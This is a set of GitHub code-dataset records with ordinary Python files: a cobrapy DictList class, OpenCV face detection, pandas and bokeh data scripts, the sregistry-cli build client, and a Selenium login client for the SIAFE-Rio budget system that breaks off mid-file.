warning :: Internal use only.\n\n Each item is unique in the list which allows this\n It is much faster to do a dict lookup than n string comparisons\n \"\"\"\n self.pop(self.index(x))\n\n # these functions are slower because they rebuild the _dict every time\n def reverse(self) -> None:\n \"\"\"Reverse *IN PLACE*.\"\"\"\n list.reverse(self)\n self._generate_index()\n\n def sort(\n self, cmp: Callable = None, key: Callable = None, reverse: bool = False\n ) -> None:\n \"\"\"Stable sort *IN PLACE*.\n\n cmp(x, y) -> -1, 0, 1\n\n \"\"\"\n if key is None:\n\n def key(i):\n return i.id\n\n list.sort(self, key=key, reverse=reverse)\n\n self._generate_index()\n\n def __getitem__(\n self, i: Union[int, slice, Iterable, Object, \"DictList\"]\n ) -> Union[\"DictList\", Object]:\n \"\"\"Get item from DictList.\"\"\"\n if isinstance(i, int):\n return list.__getitem__(self, i)\n elif isinstance(i, slice):\n selection = self.__class__()\n selection._extend_nocheck(list.__getitem__(self, i))\n return selection\n elif hasattr(i, \"__len__\"):\n if len(i) == len(self) and isinstance(i[0], (bool, bool)):\n selection = self.__class__()\n result = (o for j, o in enumerate(self) if i[j])\n selection._extend_nocheck(result)\n return selection\n else:\n return self.__class__(list.__getitem__(self, i))\n else:\n return list.__getitem__(self, i)\n\n def __setitem__(self, i: Union[slice, int], y: Union[list, Object]) -> None:\n \"\"\"Set an item via index or slice.\n\n Parameters\n ----------\n i : slice, int\n i can be slice or int. If i is a slice, y needs to be a list\n y: list, Object\n Object to set as\n \"\"\"\n if isinstance(i, slice):\n # In this case, y needs to be a list. We will ensure all\n # the id's are unique\n for obj in y: # need to be setting to a list\n self._check(obj.id)\n # Insert a temporary placeholder so we catch the presence\n # of a duplicate in the items being added\n self._dict[obj.id] = None\n list.__setitem__(self, i, y)\n self._generate_index()\n return\n # in case a rename has occurred\n if self._dict.get(self[i].id) == i:\n self._dict.pop(self[i].id)\n the_id = y.id\n self._check(the_id)\n list.__setitem__(self, i, y)\n self._dict[the_id] = i\n\n def __delitem__(self, index: int) -> None:\n \"\"\"Remove item from DictList.\"\"\"\n removed = self[index]\n list.__delitem__(self, index)\n if isinstance(removed, list):\n self._generate_index()\n return\n _dict = self._dict\n _dict.pop(removed.id)\n for i, j in _dict.items():\n if j > index:\n _dict[i] = j - 1\n\n def __getslice__(self, i: int, j: int) -> \"DictList\":\n \"\"\"Get a slice from it to j of DictList.\"\"\"\n return self.__getitem__(slice(i, j))\n\n def __setslice__(self, i: int, j: int, y: Union[list, Object]) -> None:\n \"\"\"Set slice, where y is an iterable.\"\"\"\n self.__setitem__(slice(i, j), y)\n\n def __delslice__(self, i: int, j: int) -> None:\n \"\"\"Remove slice.\"\"\"\n self.__delitem__(slice(i, j))\n\n def __getattr__(self, attr: Any) -> Any:\n \"\"\"Get an attribute by id.\"\"\"\n try:\n return DictList.get_by_id(self, attr)\n except KeyError:\n raise AttributeError(f\"DictList has no attribute or entry {attr}\")\n\n def __dir__(self) -> list:\n \"\"\"Directory of the DictList.\n\n Override this to allow tab complete of items by their id.\n\n Returns\n -------\n attributes: list\n A list of attributes/entities.\n \"\"\"\n attributes = dir(self.__class__)\n attributes.append(\"_dict\")\n attributes.extend(self._dict.keys())\n return 
attributes\n","repo_name":"opencobra/cobrapy","sub_path":"src/cobra/core/dictlist.py","file_name":"dictlist.py","file_ext":"py","file_size_in_byte":17550,"program_lang":"python","lang":"en","doc_type":"code","stars":421,"dataset":"github-code","pt":"31"}
+{"seq_id":"72331766168","text":"# Image face detection on a still picture\nimport cv2\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\nimg = cv2.imread('faces.jpg')\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)  # the cascade expects a grayscale image\n\nfaces = face_cascade.detectMultiScale(gray, 1.1, 4)\n\nfor (x, y, w, h) in faces:\n    cv2.rectangle(img, (x, y), (x+w, y+h), (0, 0, 255), 2)\n\ncv2.imshow('image', img)\ncv2.waitKey()\n\n# Image face detection using the webcam\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n    _, img = cap.read()\n\n    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n    faces = face_cascade.detectMultiScale(gray, 1.1, 4)  # detect on the grayscale frame\n\n    for (x, y, w, h) in faces:\n        cv2.rectangle(img, (x, y), (x+w, y+h), (0, 0, 255), 2)\n\n    cv2.imshow('image', img)\n    k = cv2.waitKey(30) & 0xff\n\n    if k == 27:  # Esc quits\n        break\ncap.release()\n","repo_name":"jaweria332/OpenCV-practice","sub_path":"ImageFaceDetection.py","file_name":"ImageFaceDetection.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"31344437589","text":"import pandas as pd\nimport numpy as np\n\nfilepath = \"datafile.xlsx\"\ndata = pd.read_excel(filepath, header=0, index_col=None, usecols=\"A:J\")\n\n# print(data.head(10))\n\ncol_names = list(data.columns[1:])\nprint(col_names)\n\nfor col in col_names:\n    data[col] = data[col] == 1.0\n    data[col] = data[col].astype(int)\n    data[col] = data[col].astype(str)\n\ndata['Pattern'] = data[col_names].agg('-'.join, axis=1)\n\nprint(data.head())\nprint(data.dtypes)\n\nuniquePatterns = data[\"Pattern\"].unique()\n\nfor pat in uniquePatterns:\n    rows = data.loc[data[\"Pattern\"] == pat]\n    coy = list(rows[\"Dummy Code\"])\n    filename = \"./output/output\" + pat + \".csv\"\n    with open(filename, 'w') as file:\n        rows.to_csv(file, index=None)","repo_name":"mipsmonsta/product_brand_automation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
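The pattern-splitting loop above filters the frame once per unique pattern; pandas groupby expresses the same split in a single pass. A sketch with a toy frame (the column names mirror the script, the data is made up):

import pandas as pd

data = pd.DataFrame({
    "Dummy Code": ["A", "B", "C", "D"],
    "Pattern": ["1-0", "1-0", "0-1", "0-1"],
})

# one sub-frame per distinct pattern, written out in one pass
for pattern, rows in data.groupby("Pattern"):
    rows.to_csv(f"./output/output{pattern}.csv", index=None)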
+{"seq_id":"41185893886","text":"import os\nfrom PIL import Image, ImageFilter\nimport numpy as np\nfrom numba import njit\nfrom get_data import get_data\nfrom matplotlib import pyplot as plt\n\ndir2work = os.path.normpath(input('Input an absolute path to the images: '))\ntry:\n    images_list = os.listdir(dir2work)  # ['name1.jpg', 'name2.jpg', ...]\nexcept FileNotFoundError:\n    print('Invalid value')\n    exit()\n\nprev_image = []\ncurrent_image = []\ndiffer_image = []\n\n@njit\ndef check_limits(matrix):\n    # clamp every pixel into the displayable [0, 255] range in place;\n    # rebinding the loop variable (j = 0.) would not modify the array\n    for i in range(matrix.shape[0]):\n        for j in range(matrix.shape[1]):\n            if matrix[i, j] < 0.:\n                matrix[i, j] = 0.\n            elif matrix[i, j] > 255.:\n                matrix[i, j] = 255.\n    return matrix\n\n\nintensity = []\nintensity_ch = []\nfor img in images_list:\n    ch1_data, ch2_data, ch3_data = get_data(os.path.join(dir2work, img))\n    if images_list.index(img) > 0:\n        current_images = np.array([ch1_data[0], ch2_data[0], ch3_data[0]])\n        im = Image.fromarray(current_images[2]).filter(ImageFilter.MedianFilter(size=3)).convert('L')\n        current_image = np.array(im, dtype=np.float64)  # np.float was removed from recent numpy\n        # print(type(current_image[0][0]))\n        differ_image = current_image - prev_image\n        # intensity.append(np.sum(differ_image))\n        differ_image = check_limits(differ_image)\n        # differ_image = np.array(current_image, dtype=np.uint8)\n        # intensity_ch.append(np.sum(differ_image))\n        # Image.fromarray(current_images[2]).show()\n        im = Image.fromarray(differ_image)\n        plt.imshow(im, cmap='hot')\n        plt.show()\n        im.convert('RGB').save(os.path.join(os.path.join(os.getcwd(), 'diff_images'), img))\n        print(images_list.index(img))\n    elif images_list.index(img) == 0:\n        current_image = np.array([ch1_data[0], ch2_data[0], ch3_data[0]])[2]\n    prev_image = current_image\n\n# print(intensity)\n# print(intensity_ch)\n# plt.plot(intensity, label='not ch')\n# plt.plot(intensity_ch, label='ch')\n# plt.legend()\n# plt.show()\n","repo_name":"MikhailButs/He_multich_analysis","sub_path":"app2findELM.py","file_name":"app2findELM.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30382401966","text":"import pandas as pd\r\nimport numpy as np\r\nimport math\r\nfrom bokeh.io import output_notebook\r\nfrom bokeh.plotting import figure, show\r\nfrom bokeh.transform import linear_cmap\r\nfrom bokeh.layouts import column, row\r\nfrom bokeh.models import CustomJS, Div, ColumnDataSource\r\n# def getData(csv_file):\r\n#     Data=pd.read_csv(csv_file)\r\n#     Data=Data.iloc[5:,]\r\n#     return Data\r\n# print(getData(\"alpha1 - Copy.csv\"))\r\n\r\nimport csv\r\ndef getData(csv_file,convert_angle=None,decimals=None):\r\n    with open(csv_file,'r') as roughData, open(csv_file.strip(\".csv\")+\"_Copy.csv\",'w+') as newData:\r\n        wr=csv.writer(newData)\r\n        data_in_list=[]\r\n        for row in roughData:\r\n            data_in_list.append(row)\r\n        # print(data_in_list[1][0])\r\n        for i in range(len(data_in_list)):\r\n            if data_in_list[i][0].isdigit():\r\n                newData.write(data_in_list[i-1])\r\n        newData.write(data_in_list[-1])\r\n    data=pd.read_csv(csv_file.strip(\".csv\")+\"_Copy.csv\")\r\n    if convert_angle=='rad2deg': data.iloc[:,0]=np.round(data.iloc[:,0]*180/math.pi,3)\r\n    elif convert_angle=='deg2rad': data.iloc[:,0]=np.round(data.iloc[:,0]*math.pi/180,3)\r\n\r\n    if decimals!=None: \r\n        for i in range(np.shape(data)[1]-1):\r\n            data.iloc[:,i]=np.round(data.iloc[:,i],decimals)\r\n    return data\r\n\r\n\r\n\r\ndef Transform2D(Data):\r\n    a=list(Data)[0]\r\n    f=list(Data)[-2]\r\n    R=list(Data)[-1]\r\n    list_a=[]\r\n    for alpha in Data[a].values:\r\n        if alpha not in list_a:\r\n            list_a.append(alpha)\r\n    list_f=[]\r\n    for freq in Data[f].values:\r\n        if freq not in list_f:\r\n            list_f.append(freq)\r\n    Data2D=np.zeros((len(list_a),len(list_f)))\r\n    for i in range(len(list_a)):\r\n        for j in range(len(list_f)):\r\n            Data2D[i,j]=Data[(Data[a]==list_a[i])&(Data[f]==list_f[j])][R].values[0]\r\n    return Data2D\r\n    \r\ndef dataGenerate(dataFrame,smallerPart,angle_unit=\"rad\",decimals=5):\r\n    a=list(dataFrame)[0]\r\n    f=list(dataFrame)[-2]\r\n    R=list(dataFrame)[-1]\r\n    list_a=[]\r\n    for alpha in dataFrame[a].values:\r\n        if alpha not in list_a:\r\n            list_a.append(alpha)\r\n    list_f=[]\r\n    for freq in dataFrame[f].values:\r\n        if freq not in list_f:\r\n            list_f.append(freq)\r\n    \r\n    stepF=(list_f[1]-list_f[0])/smallerPart\r\n    \r\n    newData=pd.DataFrame()\r\n    \r\n    for alpha in list_a:\r\n        \r\n        for freq in list_f:\r\n            TotalR=dataFrame[(dataFrame[a]==alpha)&(dataFrame[f]==freq)][R].values[0]\r\n            for i in range(smallerPart-1):\r\n                newData=newData.append(pd.DataFrame({a:[alpha],f:[np.round(freq+(i+1)*stepF,decimals)],R:[TotalR]}))\r\n    return newData\r\n\r\n\r\ndef drawSurface(csv_file,smallerPart,angle_unit='rad',decimals=5,output='html'):\r\n    df1=getData(csv_file,'deg',decimals=decimals)\r\n    
df=dataGenerate(df1,smallerPart=smallerPart,decimals=decimals)\r\n Data=Transform2D(df)\r\n\r\n a=list(df)[0]\r\n f=list(df)[-2]\r\n R=list(df)[-1]\r\n\r\n list_a=pd.unique(df1[a])\r\n list_f=pd.unique(df1[f])\r\n \r\n if output=='ipynb' : output_notebook()\r\n s1=ColumnDataSource(data=dict(x=df[a],y=df[f]))\r\n p=figure(tools=\"lasso_select,box_select\")\r\n p.circle('x','y',source=s1, fill_color=\"red\",fill_alpha=0.2)\r\n p.image(image=[Data.T], x=0, y=np.amin(df[f]), dw=np.amax(df[a]), dh=np.amax(df[f])-np.amin(df[f]), palette='Magma256', level=\"image\")\r\n p.grid.grid_line_width = 0.1\r\n\r\n\r\n s2=ColumnDataSource(data=dict(x=[],y=[]))\r\n div=Div(width=p.width, height=20000)\r\n p2=figure()\r\n p2.circle('x','y',source=s2, fill_color=\"red\")\r\n\r\n s1.selected.js_on_change('indices', CustomJS(args=dict(s1=s1,s2=s2,div=div), code=\"\"\"\r\n const inds=cb_obj.indices;\r\n const d1 = s1.data;\r\n const d2 = s2.data;\r\n d2['x'] = []\r\n d2['y'] = []\r\n for (let i = 0; i < inds.length; i++) {\r\n d2['x'].push(d1['x'][inds[i]])\r\n d2['y'].push(d1['y'][inds[i]])\r\n \r\n }\r\n div.text=[d2['x'].join(\" \"), d2['y'].join(\" \"),inds.length].join(\"\\\\n\")\r\n \"\"\")\r\n )\r\n\r\n\r\n layout=column(p,div)\r\n show(layout)\r\n ","repo_name":"hoanglv7501/comsol-optimize","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6884017347","text":"from sregistry.logger import bot\nimport json\nimport sys\nimport re\n\n\ndef main(args, parser, extra):\n from sregistry.main import get_client\n\n if args.name is None:\n msg = \"You must add the --name of a container uri to build.\"\n bot.exit(msg)\n\n cli = get_client(image=args.name, quiet=args.quiet)\n cli.announce(args.command)\n\n # If the client doesn't have the command, exit\n if not hasattr(cli, \"build\"):\n msg = \"build is not implemented for %s. Why don't you add it?\"\n bot.exit(msg % cli.client_name)\n\n # Singularity Registry Server uses build with a recipe\n if cli.client_name == \"google-build\":\n response = run_google_build(cli, args)\n\n elif cli.client_name == \"google-storage\":\n response = run_compute_build(cli, args)\n\n # Currently allows for google_build\n else:\n bot.warning(\"No URI specified, assuming Singularity Registry with Builder\")\n response = run_registry_build(cli, args, extra)\n\n # If the client wants to preview, the config is returned\n if args.preview:\n print(json.dumps(response, indent=4, sort_keys=True))\n\n\ndef run_google_build(cli, args):\n \"\"\"a helper function to control build for the Google Build Client.\n the user can request a local recipe build, or a build from\n a GitHub repo. 
In both cases, if no recipe is provided, we default\n to Singularity at the root of the PWD or GitHub repository.\n \"\"\"\n if args.name is None:\n bot.exit(\"Please provide a container identifier with --name\")\n\n # Default to recipe \"Singularity\" unless other is provided\n recipe = \"Singularity\"\n if args.commands:\n recipe = args.commands.pop(0)\n\n # If Github.com is provided in the name, we are doing a GitHub build\n if re.search(\"github.com|gitlab.com\", args.name):\n name = args.name.replace(\"google-build://\", \"\")\n response = cli.build_repo(repo=name, recipe=recipe, preview=args.preview)\n\n else:\n response = cli.build(\n name=args.name, recipe=recipe, context=args.commands, preview=args.preview\n )\n\n # Print output to the console\n if not args.preview:\n print_output(response, args.outfile)\n return response\n\n\ndef run_compute_build(cli, args):\n \"\"\"a compute based build is the oldest versions of build - here we bring\n up our own instance, and then provide control to it. The helper\n functions below (kill, instances, templates) support this version.\n \"\"\"\n # Does the user want to save the image?\n command = args.commands.pop(0)\n\n # Option 1: The user wants to kill an instance\n if command == \"kill\":\n kill(args)\n\n # Option 2: Just list running instances\n elif command == \"instances\":\n instances(args)\n\n # Option 3: The user wants to list templates\n elif \"template\" in command:\n templates(args)\n\n # Option 4: View a specific or latest log\n elif command == \"logs\":\n list_logs(args)\n\n # Option 3: The user is providing a Github repo!\n recipe = \"Singularity\"\n\n if \"github\" in command:\n # One argument indicates a recipe\n if len(args.commands) == 1:\n recipe = args.commands.pop(0)\n\n else:\n # If a command is provided, but not a Github repo\n bot.exit(\"%s is not a recognized option.\" % command)\n\n # Does the user want to specify a name for the collection?\n name = args.name\n\n # No image is needed, we are creating in the cloud\n return cli.build(repo=command, name=name, recipe=recipe, preview=args.preview)\n\n\ndef run_registry_build(cli, args, extra):\n \"\"\"a registry build pushes a recipe file to Singularity Registry Server,\n or given that a GitHub Url is provided, we build from there. For more\n regular building, the user is suggested to directly connect the\n repository to Singularity Registry server. This can serve as a one time\n build.\n \"\"\"\n # The uri can also contain github, which indicates a Github build\n if args.name is None:\n bot.exit(\"Please provide a container identifier with --name\")\n\n recipe = args.commands.pop(0)\n response = cli.build(name=args.name, recipe=recipe, extra=extra)\n\n # Print output to the console\n if response is not None:\n print_output(response, args.outfile)\n return response\n\n\ndef print_output(response, output_file=None):\n \"\"\"print the output to the console for the user. 
If the user wants the content\n also printed to an output file, do that.\n\n Parameters\n ==========\n response: the response from the builder, with metadata added\n output_file: if defined, write output also to file\n\n \"\"\"\n # If successful built, show container uri\n if \"status\" in response:\n if response[\"status\"] == \"SUCCESS\":\n bucket = response[\"artifacts\"][\"objects\"][\"location\"]\n obj = response[\"artifacts\"][\"objects\"][\"paths\"][0]\n bot.custom(\"MD5HASH\", response[\"file_hash\"], \"CYAN\")\n bot.custom(\"SIZE\", response[\"size\"], \"CYAN\")\n bot.custom(response[\"status\"], bucket + obj, \"CYAN\")\n else:\n bot.custom(response[\"status\"], \"see logs for details\", \"CYAN\")\n\n # Show the logs no matter what\n bot.custom(\"LOGS\", response[\"logUrl\"], \"CYAN\")\n\n # Did the user make the container public?\n if \"public_url\" in response:\n bot.custom(\"URL\", response[\"public_url\"], \"CYAN\")\n\n # Does the user also need writing to an output file?\n if output_file is not None:\n with open(output_file, \"w\") as filey:\n if response[\"status\"] == \"SUCCESS\":\n filey.writelines(\"MD5HASH %s\\n\" % response[\"file_hash\"])\n filey.writelines(\"SIZE %s\\n\" % response[\"size\"])\n filey.writelines(\"%s %s%s\\n\" % (response[\"status\"], bucket, obj))\n filey.writelines(\"LOGS %s\\n\" % response[\"logUrl\"])\n if \"public_url\" in response:\n filey.writelines(\"URL %s\\n\" % response[\"public_url\"])\n\n\ndef kill(args):\n \"\"\"kill is a helper function to call the \"kill\" function of the client,\n meaning we bring down an instance.\n \"\"\"\n from sregistry.main import get_client\n\n cli = get_client(quiet=args.quiet)\n if len(args.commands) > 0:\n for name in args.commands:\n cli.destroy(name)\n sys.exit(0)\n\n\ndef instances(args):\n \"\"\"list running instances for a user, including all builders and report\n instance names and statuses.\n \"\"\"\n from sregistry.main import get_client\n\n cli = get_client(quiet=args.quiet)\n cli.list_builders()\n sys.exit(0)\n\n\ndef templates(args, template_name=None):\n \"\"\"list a specific template (if a name is provided) or all templates\n available.\n\n Parameters\n ==========\n args: the argparse object to look for a template name\n template_name: if not set, show all\n\n \"\"\"\n from sregistry.main import get_client\n\n # We don't need storage/compute connections\n cli = get_client(init=False, quiet=args.quiet)\n\n if len(args.commands) > 0:\n template_name = args.commands.pop(0)\n cli.list_templates(template_name)\n sys.exit(0)\n\n\ndef list_logs(args, container_name=None):\n \"\"\"list a specific log for a builder, or the latest log if none provided\n\n Parameters\n ==========\n args: the argparse object to look for a container name\n container_name: a default container name set to be None (show latest log)\n\n \"\"\"\n from sregistry.main import get_client\n\n cli = get_client(quiet=args.quiet)\n if args.commands:\n container_name = args.commands.pop(0)\n cli.logs(container_name)\n sys.exit(0)\n","repo_name":"singularityhub/sregistry-cli","sub_path":"sregistry/client/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":7607,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"32"} +{"seq_id":"35643003725","text":"# pylint: disable=fixme, import-error, too-many-arguments\r\n\r\n# Copyright 2020 Ministério Público do Estado do Rio de Janeiro\r\n\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file 
except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\n\"\"\"Interfaces for interacting with SIAFE-Rio in an automated way.\r\n\r\n Rio de Janeiro's Integrated System for Budget Management (SIAFE-Rio) is the\r\n main tool for recording, monitoring and enforcing information regarding to\r\n the State of Rio de Janeiro's public budget, assets and financial\r\n execution.\r\n\r\n This module maps SIAFE-Rio web interface to Python classes and methods.\r\n\"\"\"\r\n\r\nimport os\r\nimport re\r\nimport sys\r\nimport time\r\nfrom datetime import date, timedelta\r\nfrom functools import cached_property\r\nfrom typing import Mapping, Optional, Sequence, Union\r\n\r\nimport log # type: ignore\r\nfrom dotenv import load_dotenv\r\nfrom selenium import webdriver\r\nfrom selenium.common.exceptions import ( # NoSuchElementException,\r\n NoSuchAttributeException,\r\n StaleElementReferenceException,\r\n)\r\nfrom selenium.webdriver.chrome.options import Options as ChromeOptions\r\nfrom selenium.webdriver.support.ui import Select\r\n\r\nfrom bussola_etl_siafe.components.filters import FilterMenu\r\n\r\nload_dotenv(\"../.env\")\r\n\r\nsys.path.append(os.environ[\"CHROME_PATH\"])\r\n\r\n\r\nclass SiafeClient:\r\n \"\"\"Chrome WebDriver signed in SIAFE-Rio Basic Module.\r\n\r\n SIAFE-Rio Basic Module provides the most commonly used information in the\r\n system as standardized tables and reports. This class uses the provided\r\n credentials and a Chrome WebDriver (controlled by Selenium) to establish a\r\n connection and sign in the Basic Module, providing an automated interface\r\n to interact with the system.\r\n\r\n Arguments:\r\n user: User name or number in SIAFE system (usually, the user's Natural\r\n Person Registry number - CPF).\r\n password: User password in SIAFE system.\r\n driver_path: Path to the ChromeDriver executable (available at\r\n https://sites.google.com/a/chromium.org/chromedriver/downloads).\r\n\r\n Keyword Arguments:\r\n fiscal_year: Fiscal year for budget planning and execution. Defaults to\r\n the current year.\r\n timeout: Maximum time to wait for an element while browsing the page\r\n (in seconds). Defaults to 10 seconds.\r\n\r\n Attributes:\r\n build: SIAFE-Rio current build. Not implemented yet.\r\n fiscal_year: Fiscal year for budget planning and execution information\r\n shown in the system.\r\n remaining_time: Remaining time for the current session. Not implemented\r\n yet.\r\n timeout: Maximum time to wait for an element while browsing the page\r\n (in seconds).\r\n user: User name or number currently signed in the SIAFE system.\r\n version: SIAFE-Rio current version. 
Not implemented yet.\r\n\r\n Raises:\r\n NotImplementedError: When a method or attribute that is not\r\n implemented yet is called.\r\n TimeoutException: If an element cannot be located after the specified\r\n timeout.\r\n \"\"\"\r\n\r\n _greeting_statement_id = 'pt1:pt_aot1'\r\n _ug_select_id = 'pt1:selUg::content'\r\n _login_url: str = 'https://www5.fazenda.rj.gov.br/SiafeRio/faces/login.jsp'\r\n # _thematic_tab_ids: Mapping[str, str] = {\r\n # 'planning': 'pt1:pt_np4:0:pt_cni6::disclosureAnchor',\r\n # 'execution': 'pt1:pt_np4:1:pt_cni6::disclosureAnchor',\r\n # 'projects': 'pt1:pt_np4:2:pt_cni6::disclosureAnchor',\r\n # 'helpers': 'pt1:pt_np4:3:pt_cni6::disclosureAnchor',\r\n # 'administration': 'pt1:pt_np4:4:pt_cni6::disclosureAnchor',\r\n # 'reports': 'pt1:pt_np4:5:pt_cni6::disclosureAnchor',\r\n # }\r\n\r\n def __init__(\r\n self,\r\n user: str,\r\n password: str,\r\n driver_path: Union[str, bytes, os.PathLike],\r\n driver_options: Optional[ChromeOptions] = None,\r\n fiscal_year: int = date.today().year,\r\n timeout: int = 10,\r\n ):\r\n self.user = user\r\n self._password = password\r\n self.fiscal_year = fiscal_year\r\n self.timeout = timeout\r\n\r\n log.debug('Starting Chrome WebDriver session...')\r\n self.driver = webdriver.Chrome(driver_path, options=driver_options)\r\n self.driver.implicitly_wait(self.timeout)\r\n self.driver.set_window_size(3840, 2160)\r\n\r\n log.info('Connecting to SIAFE-Rio Basic Module...')\r\n try:\r\n self._login()\r\n except (StaleElementReferenceException, TimeoutError):\r\n # Could not find greetings, something has gone wrong\r\n self.close()\r\n log.error(\r\n 'An unexpected error occurred. Could not connect to SIAFE-Rio.'\r\n )\r\n raise ConnectionError\r\n else:\r\n log.info('Successfully signed in SIAFE-Rio Basic module.')\r\n\r\n def _login(self):\r\n \"\"\"Interact with login form for SIAFE-Rio .\r\n\r\n Interacts with SIAFE-Rio login form, inputing user credentials,\r\n selecting the fiscal year and submiting the form.\r\n \"\"\"\r\n login_form_ids: Mapping[str, str] = {\r\n 'user_input': 'loginBox:itxUsuario::content',\r\n 'password_input': 'loginBox:itxSenhaAtual::content',\r\n 'fiscal_year_select': 'loginBox:cbxExercicio::content',\r\n 'submit_button': 'loginBox:btnConfirmar',\r\n }\r\n self.driver.get(self._login_url)\r\n # insert user\r\n log.debug('Entering user ID')\r\n user_input = self.driver.find_element_by_id(\r\n login_form_ids['user_input']\r\n )\r\n user_input.send_keys(self.user)\r\n # select fiscal year\r\n log.debug(f'Selecting fiscal year ({self.fiscal_year})')\r\n fiscal_year_select = self.driver.find_element_by_id(\r\n login_form_ids['fiscal_year_select']\r\n )\r\n Select(fiscal_year_select).select_by_visible_text(\r\n str(self.fiscal_year)\r\n )\r\n # try to insert password\r\n for attempt in range(1, 4):\r\n try:\r\n log.debug(f'Entering user password ({attempt}/3)')\r\n password_input = self.driver.find_element_by_id(\r\n login_form_ids['password_input']\r\n )\r\n password_value = password_input.get_attribute('value')\r\n assert len(password_value) == len(self._password)\r\n time.sleep(2)\r\n except (AssertionError, NoSuchAttributeException):\r\n password_input.send_keys(self._password)\r\n # submit\r\n log.debug('Submiting credentials')\r\n submit_button = self.driver.find_element_by_id(\r\n login_form_ids['submit_button']\r\n )\r\n submit_button.click()\r\n time.sleep(2)\r\n\r\n def greet(self) -> str:\r\n \"\"\"Say Hello to user (for checking the connection)\"\"\"\r\n greetings = self.driver.find_element_by_id(\r\n 
self._greeting_statement_id\r\n ).text\r\n return greetings\r\n\r\n def reset(self):\r\n \"\"\"Force driver to go back to initial page.\"\"\"\r\n raise NotImplementedError\r\n\r\n def close(self) -> None:\r\n \"\"\"Close the current connection.\"\"\"\r\n self.driver.close()\r\n\r\n @property\r\n def available_ugs(self) -> Sequence[Mapping[str, str]]:\r\n \"\"\"Get available Managemet Units (UGs).\"\"\"\r\n log.info('Checking available budget Management Units...')\r\n ug_select = Select(self.driver.find_element_by_id(self._ug_select_id))\r\n ug_options = ug_select.options\r\n # UG visible text has the format '999999 - NAME OF THE UNIT'; split it\r\n ugs_splitted = [\r\n re.split(' +- +', ug_option.text, 1) for ug_option in ug_options\r\n ]\r\n # create a dict with UG name and id for each one\r\n available_ugs = list()\r\n for ug_splitted in ugs_splitted:\r\n if ug_splitted[0] == 'TODAS':\r\n # 'ALL' budget management units option\r\n available_ugs.append({'id': '000000', 'name': 'TODAS'})\r\n else:\r\n available_ugs.append(\r\n {'id': ug_splitted[0], 'name': ug_splitted[1]}\r\n )\r\n # make available units accessible instance-wide\r\n self._available_ugs = available_ugs\r\n return self._available_ugs\r\n\r\n @property\r\n def ug(self) -> Mapping[str, str]:\r\n \"\"\"Get current budget Management Unit (UG).\"\"\"\r\n log.info('Checking current Management Unit...')\r\n # current unit appears in the \"title\" attribute of the